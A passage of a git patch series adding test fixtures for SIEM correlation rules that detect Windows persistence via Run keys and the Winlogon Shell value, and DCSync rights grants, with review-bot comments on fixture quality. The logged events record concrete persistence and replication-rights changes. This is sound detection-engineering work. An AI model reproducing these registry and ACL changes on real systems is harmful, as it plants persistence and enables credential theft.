"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4657\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12801\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-12T18:39:17.9066951Z\"},\"EventRecordID\":\"27724621\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"5664\"},\"Channel\":\"Security\",\"Computer\":\"win10-work.stand2008.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3800063338-4262557262-2801230003-500\"},{\"Name\":\"SubjectUserName\",\"text\":\"Администратор\"},{\"Name\":\"SubjectDomainName\",\"text\":\"STAND2008\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x4c7672\"},{\"Name\":\"ObjectName\",\"text\":\"\\\\REGISTRY\\\\USER\\\\S-1-5-21-3800063338-4262557262-2801230003-500\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\"},{\"Name\":\"ObjectValueName\"},{\"Name\":\"HandleId\",\"text\":\"0x46004f00530000\"},{\"Name\":\"OperationType\",\"text\":\"TWARE\\\\\"},{\"Name\":\"OldValueType\",\"text\":\"°\"},{\"Name\":\"OldValue\"},{\"Name\":\"NewValueType\"},{\"Name\":\"NewValue\",\"text\":\"%%1906\"},{\"Name\":\"ProcessId\",\"text\":\"0x38003100250025\"},{\"Name\":\"ProcessName\",\"text\":\"73\"}]}}}", "category.generic": "Registry Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Operating system", "event_src.fqdn": "win10-work.stand2008.local", "event_src.host": "win10-work.stand2008.local", "event_src.hostname": "win10-work", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4657_Registry_value_changed", "importance": "info", "input_id": 
"00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4657", "normalized": true, "object": "reg_object", "object.fullpath": "\\registry\\user\\s-1-5-21-3800063338-4262557262-2801230003-500\\software\\microsoft\\windows\\currentversion\\run\\", "object.new_value": "%%1906", "object.path": "\\registry\\user\\s-1-5-21-3800063338-4262557262-2801230003-500\\software\\microsoft\\windows\\currentversion\\run", "object.property": "value", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-12T19:31:34.632Z", "status": "success", "subject": "account", "subject.account.domain": "stand2008", "subject.account.id": "S-1-5-21-3800063338-4262557262-2801230003-500", "subject.account.name": "администратор", "subject.account.session_id": "5011058", "subject.process.fullpath": "73", "subject.process.name": "73", "subject.process.path": "", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-12T18:39:17.906Z", "type": "raw", "uuid": "c955449d-632d-4905-b52c-d69e843f8371"} + +# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "modify", "category.generic": "Attack", "category.high": "Persistence", "category.low": "Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder", "correlation_name": "Create_persist_via_Hidden_Run_key_value", "correlation_type": "incident", "event_src.category": "Operating system", "event_src.fqdn": "win10-work.stand2008.local", "event_src.host": "win10-work.stand2008.local", "event_src.hostname": "win10-work", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Create_persist_via_Hidden_Run_key_value|win10-work.stand2008.local|%%1873", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "reg_object", "object.fullpath": "\\registry\\user\\s-1-5-21-3800063338-4262557262-2801230003-500\\software\\microsoft\\windows\\currentversion\\run\\", "object.new_value": "%%1904", "object.path": "\\registry\\user\\s-1-5-21-3800063338-4262557262-2801230003-500\\software\\microsoft\\windows\\currentversion\\run", "object.property": "value", "status": "success", "subject": "account", "subject.account.domain": "stand2008", "subject.account.id": "S-1-5-21-3800063338-4262557262-2801230003-500", "subject.account.name": "администратор", "subject.account.session_id": "5011058", "subject.process.fullpath": "%%1873", "subject.process.name": "%%1873", "subject.process.path": ""} From 5d0ebad5d8446755f7c52c37bad84590048f8897 Mon Sep 17 00:00:00 2001 
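Review bot: The two 4657 events differ only in `object.new_value` (`%%1904` vs `%%1906`), the raw `ProcessId`, and `subject.process.name`/`fullpath` (`%%1873` vs `73`), and `expect 1` selects the first, but nothing in the file says which of those fields the rule keys on. Both events' EventData also look field-shifted (`OperationType` is `TWARE\\`, `OldValueType` is `°`, `ObjectValueName` is empty) and the `%%NNNN` tokens look like unresolved parameter-string references, so the fixture pins behaviour on a malformed rendering; a normalizer change that resolves those placeholders or realigns the fields would flip the result without any hint why. Replace the placeholder comment with something like `# 4657 with empty ObjectValueName and unresolved %%NNNN placeholders (field-shifted rendering); rule must fire on the first event and stay silent on the second — discriminator: <field> — TODO confirm`. Note too that `incident.aggregation.key` ends in `%%1873`, so incidents are aggregated on a placeholder rather than a process name; if that is acceptable it deserves a word in the same comment.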
From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Tue, 1 Aug 2023 12:06:34 +0300 Subject: [PATCH 42/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Create?= =?UTF-8?q?=5Fpersist=5Fvia=5FWinlogonShell)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Create_persist_via_WinlogonShell/tests/test_1.sc | 4 ++++ .../Create_persist_via_WinlogonShell/tests/test_2.sc | 4 ++++ 2 files changed, 8 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_WinlogonShell/tests/test_1.sc create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_WinlogonShell/tests/test_2.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_WinlogonShell/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_WinlogonShell/tests/test_1.sc new file mode 100644 index 00000000..f90019a9 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_WinlogonShell/tests/test_1.sc 
@@ -0,0 +1,4 @@ +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"13\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"13\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-06-14T22:22:21.5352457Z\"},\"EventRecordID\":\"7532\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1960\",\"ThreadID\":\"288\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\",\"text\":\"Persistence - Winlogon Shell\"},{\"Name\":\"EventType\",\"text\":\"SetValue\"},{\"Name\":\"UtcTime\",\"text\":\"2019-06-14 22:22:21.519\"},{\"Name\":\"ProcessGuid\",\"text\":\"{365abb72-1e19-5d04-0000-0010dfc60a00}\"},{\"Name\":\"ProcessId\",\"text\":\"4020\"},{\"Name\":\"Image\",\"text\":\"C:\\\\Users\\\\IEUser\\\\Downloads\\\\a.exe\"},{\"Name\":\"TargetObject\",\"text\":\"HKU\\\\S-1-5-21-3583694148-1414552638-2922671848-1000\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Shell\"},{\"Name\":\"Details\",\"text\":\"\\\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Roaming\\\\9QxTsAU9w8gyPj4w\\\\BRE6BgE2JubB.exe\\\",explorer.exe\"}]}}}", "category.generic": "Registry Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.rule": "Persistence - Winlogon Shell", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_13_Registry_value_changed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": 
"application/x-pt-eventlog", "msgid": "13", "normalized": true, "object": "reg_object", "object.fullpath": "\\registry\\user\\s-1-5-21-3583694148-1414552638-2922671848-1000\\software\\microsoft\\windows nt\\currentversion\\winlogon\\shell", "object.name": "shell", "object.new_value": "\"c:\\users\\ieuser\\appdata\\roaming\\9qxtsau9w8gypj4w\\bre6bge2jubb.exe\",explorer.exe", "object.path": "\\registry\\user\\s-1-5-21-3583694148-1414552638-2922671848-1000\\software\\microsoft\\windows nt\\currentversion\\winlogon\\", "object.property": "value", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T11:42:28.474Z", "status": "success", "subject.process.fullpath": "c:\\users\\ieuser\\downloads\\a.exe", "subject.process.guid": "365abb72-1e19-5d04-0000-0010dfc60a00", "subject.process.id": "4020", "subject.process.name": "a.exe", "subject.process.path": "c:\\users\\ieuser\\downloads\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-06-14T22:22:21.519Z", "type": "raw", "uuid": "6e66670d-b0b9-4457-8552-6bebc5dfcfbf"} + +# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "modify", "category.generic": "Persistence", "category.high": "Boot or Logon Autostart Execution", "category.low": "Winlogon Helper DLL", "correlation_name": "Create_persist_via_WinlogonShell", "correlation_type": "incident", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.rule": "Persistence - Winlogon Shell", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Create_persist_via_WinlogonShell|iewin7|a.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "reg_object", "object.fullpath": "\\registry\\user\\s-1-5-21-3583694148-1414552638-2922671848-1000\\software\\microsoft\\windows nt\\currentversion\\winlogon\\shell", "object.name": "shell", "object.new_value": "\"c:\\users\\ieuser\\appdata\\roaming\\9qxtsau9w8gypj4w\\bre6bge2jubb.exe\",explorer.exe", "object.path": "\\registry\\user\\s-1-5-21-3583694148-1414552638-2922671848-1000\\software\\microsoft\\windows nt\\currentversion\\winlogon\\", "object.property": "value", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\users\\ieuser\\downloads\\a.exe", "subject.process.id": "4020", "subject.process.name": "a.exe", "subject.process.path": "c:\\users\\ieuser\\downloads\\"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_WinlogonShell/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_WinlogonShell/tests/test_2.sc new file mode 100644 index 00000000..5259e5bf --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_persist/Create_persist_via_WinlogonShell/tests/test_2.sc 
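Review bot: The expected incident pins a category triple (`"category.generic": "Persistence", "category.high": "Boot or Logon Autostart Execution", "category.low": "Winlogon Helper DLL"`) that does not follow the scheme the neighbouring rules in this series use — the Create_persist_via_Hidden_Run_key_value and DCSync_prepare_Add_replicatation_rights_to_Account expects both carry `"category.generic": "Attack", "category.high": "Persistence"` with the technique name in `category.low`. The test only records what the rule emits, so if this mirrors the rule's current metadata the mismatch sits in the rule (outside this patch) and the test is now pinning it; either way it is worth aligning before it becomes the reference for further tests, since any downstream view that keys on `category.generic` being `Attack` would not see these incidents. The same triple is pinned by test_2.sc's expect in this commit.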
@@ -0,0 +1,4 @@ +{"action": "create", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4657\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12801\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-02T12:14:16.1854466Z\"},\"EventRecordID\":\"25854299\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"3856\"},\"Channel\":\"Security\",\"Computer\":\"win10-work.stand2008.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3800063338-4262557262-2801230003-500\"},{\"Name\":\"SubjectUserName\",\"text\":\"Администратор\"},{\"Name\":\"SubjectDomainName\",\"text\":\"STAND2008\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x26ed88\"},{\"Name\":\"ObjectName\",\"text\":\"\\\\REGISTRY\\\\USER\\\\S-1-5-21-3800063338-4262557262-2801230003-500\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\"},{\"Name\":\"ObjectValueName\",\"text\":\"Shell\"},{\"Name\":\"HandleId\",\"text\":\"0xc0\"},{\"Name\":\"OperationType\",\"text\":\"%%1904\"},{\"Name\":\"OldValueType\",\"text\":\"-\"},{\"Name\":\"OldValue\",\"text\":\"-\"},{\"Name\":\"NewValueType\",\"text\":\"%%1873\"},{\"Name\":\"NewValue\",\"text\":\"c:\\\\windows\\\\system32\\\\cmd.exe, explorer.exe\"},{\"Name\":\"ProcessId\",\"text\":\"0x2078\"},{\"Name\":\"ProcessName\",\"text\":\"C:\\\\Windows\\\\System32\\\\reg.exe\"}]}}}", "category.generic": "Registry Object", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Operating system", "event_src.fqdn": "win10-work.stand2008.local", "event_src.host": "win10-work.stand2008.local", "event_src.hostname": "win10-work", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": 
"logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4657_Registry_value_changed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4657", "normalized": true, "object": "reg_object", "object.fullpath": "\\registry\\user\\s-1-5-21-3800063338-4262557262-2801230003-500\\software\\microsoft\\windows nt\\currentversion\\winlogon\\shell", "object.name": "shell", "object.new_value": "c:\\windows\\system32\\cmd.exe, explorer.exe", "object.path": "\\registry\\user\\s-1-5-21-3800063338-4262557262-2801230003-500\\software\\microsoft\\windows nt\\currentversion\\winlogon", "object.property": "value", "object.value": "-", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T12:24:03.952Z", "status": "success", "subject": "account", "subject.account.domain": "stand2008", "subject.account.id": "S-1-5-21-3800063338-4262557262-2801230003-500", "subject.account.name": "администратор", "subject.account.session_id": "2551176", "subject.process.fullpath": "C:\\Windows\\System32\\reg.exe", "subject.process.name": "reg.exe", "subject.process.path": "C:\\Windows\\System32\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-02T12:14:16.185Z", "type": "raw", "uuid": "66cc727a-80f6-40a6-8b57-5f2a9272ac55"} + +# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "modify", "category.generic": "Persistence", "category.high": "Boot or Logon Autostart Execution", "category.low": "Winlogon Helper DLL", "correlation_name": "Create_persist_via_WinlogonShell", "correlation_type": "incident", "event_src.category": "Operating system", "event_src.fqdn": "win10-work.stand2008.local", "event_src.host": "win10-work.stand2008.local", "event_src.hostname": "win10-work", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Create_persist_via_WinlogonShell|win10-work.stand2008.local|reg.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "object": "reg_object", "object.fullpath": "\\registry\\user\\s-1-5-21-3800063338-4262557262-2801230003-500\\software\\microsoft\\windows nt\\currentversion\\winlogon\\shell", "object.name": "shell", "object.new_value": "c:\\windows\\system32\\cmd.exe, explorer.exe", "object.path": "\\registry\\user\\s-1-5-21-3800063338-4262557262-2801230003-500\\software\\microsoft\\windows nt\\currentversion\\winlogon", "object.property": "value", "object.value": "-", "status": "success", "subject": "process", "subject.account.domain": "stand2008", "subject.account.id": "S-1-5-21-3800063338-4262557262-2801230003-500", "subject.account.name": "администратор", "subject.account.session_id": "2551176", "subject.process.fullpath": "C:\\Windows\\System32\\reg.exe", "subject.process.name": "reg.exe", "subject.process.path": "C:\\Windows\\System32\\"} From 40d52d9b1c82dc95844ce5a509016455433e71db Mon Sep 17 00:00:00 2001 
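Review bot: Both fixtures added for Create_persist_via_WinlogonShell (test_1.sc and this one) are positive cases with `expect 1`, so nothing in the suite pins the rule's false-positive boundary; a companion fixture with `expect 0` — for example the same 4657 event with `NewValue` holding the stock `explorer.exe` — would demonstrate that a benign write to the Winlogon `Shell` value does not raise an incident. The rule body is not part of this patch, so whether it already filters default values cannot be checked from here. The scaffold comment `# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь` is also left verbatim in both files; unless the test runner relies on it, replacing it with a one-line comment naming the scenario (4657 from reg.exe setting `Shell` to `cmd.exe, explorer.exe`) would document the test better.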
From: shadow2033 <135636880+shadow2033@users.noreply.github.com>
Date: Tue, 1 Aug 2023 12:15:36 +0300
Subject: [PATCH 43/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(DCSync?= =?UTF-8?q?=5Fprepare=5FAdd=5Freplicatation=5Frights=5Fto=5FAccount)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../tests/test_1.sc | 5 +++++
.../tests/test_2.sc | 5 +++++
2 files changed, 10 insertions(+)
create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_persist/DCSync_prepare_Add_replicatation_rights_to_Account/tests/test_1.sc
create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_persist/DCSync_prepare_Add_replicatation_rights_to_Account/tests/test_2.sc
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_persist/DCSync_prepare_Add_replicatation_rights_to_Account/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_persist/DCSync_prepare_Add_replicatation_rights_to_Account/tests/test_1.sc
new file mode 100644
index 00000000..d81faf71
--- /dev/null
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_persist/DCSync_prepare_Add_replicatation_rights_to_Account/tests/test_1.sc
@@ -0,0 +1,5 @@ +{"action": "modify", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"5136\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14081\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-03-25T21:28:45.0236298Z\"},\"EventRecordID\":\"198242592\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"444\",\"ThreadID\":\"896\"},\"Channel\":\"Security\",\"Computer\":\"DC1.insecurebank.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"OpCorrelationID\",\"text\":\"{57dccd4c-7381-4371-8480-d74d47019ad8}\"},{\"Name\":\"AppCorrelationID\",\"text\":\"-\"},{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-738609754-2819869699-4189121830-1108\"},{\"Name\":\"SubjectUserName\",\"text\":\"bob\"},{\"Name\":\"SubjectDomainName\",\"text\":\"insecurebank\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x40f2719\"},{\"Name\":\"DSName\",\"text\":\"insecurebank.local\"},{\"Name\":\"DSType\",\"text\":\"%%14676\"},{\"Name\":\"ObjectDN\",\"text\":\"DC=insecurebank,DC=local\"},{\"Name\":\"ObjectGUID\",\"text\":\"{c6faf700-bfe4-452a-a766-424f84c29583}\"},{\"Name\":\"ObjectClass\",\"text\":\"domainDNS\"},{\"Name\":\"AttributeLDAPDisplayName\",\"text\":\"nTSecurityDescriptor\"},{\"Name\":\"AttributeSyntaxOID\",\"text\":\"2.5.5.15\"},{\"Name\":\"AttributeValue\",\"text\":\"O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00
c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;E
D)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)\"},{\"Name\":\"OperationType\",\"text\":\"%%14675\"}]}}}", "category.generic": "Directory Service Object", "category.high": "System Management", "category.low": "Manipulation", "chain_id": "{57dccd4c-7381-4371-8480-d74d47019ad8}", "event_src.category": "Directory service", "event_src.fqdn": "dc1.insecurebank.local", "event_src.host": "dc1.insecurebank.local", "event_src.hostname": "dc1", "event_src.subsys": "Security", "event_src.title": "active_directory", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_5136_A_directory_service_object_was_modified", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "5136", "normalized": true, "object": "ds_object", "object.id": "{c6faf700-bfe4-452a-a766-424f84c29583}", "object.name": "DC=insecurebank,DC=local", "object.property": "nTSecurityDescriptor", "object.state": "value deleted", "object.type": "domainDNS", "object.value": 
"O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;C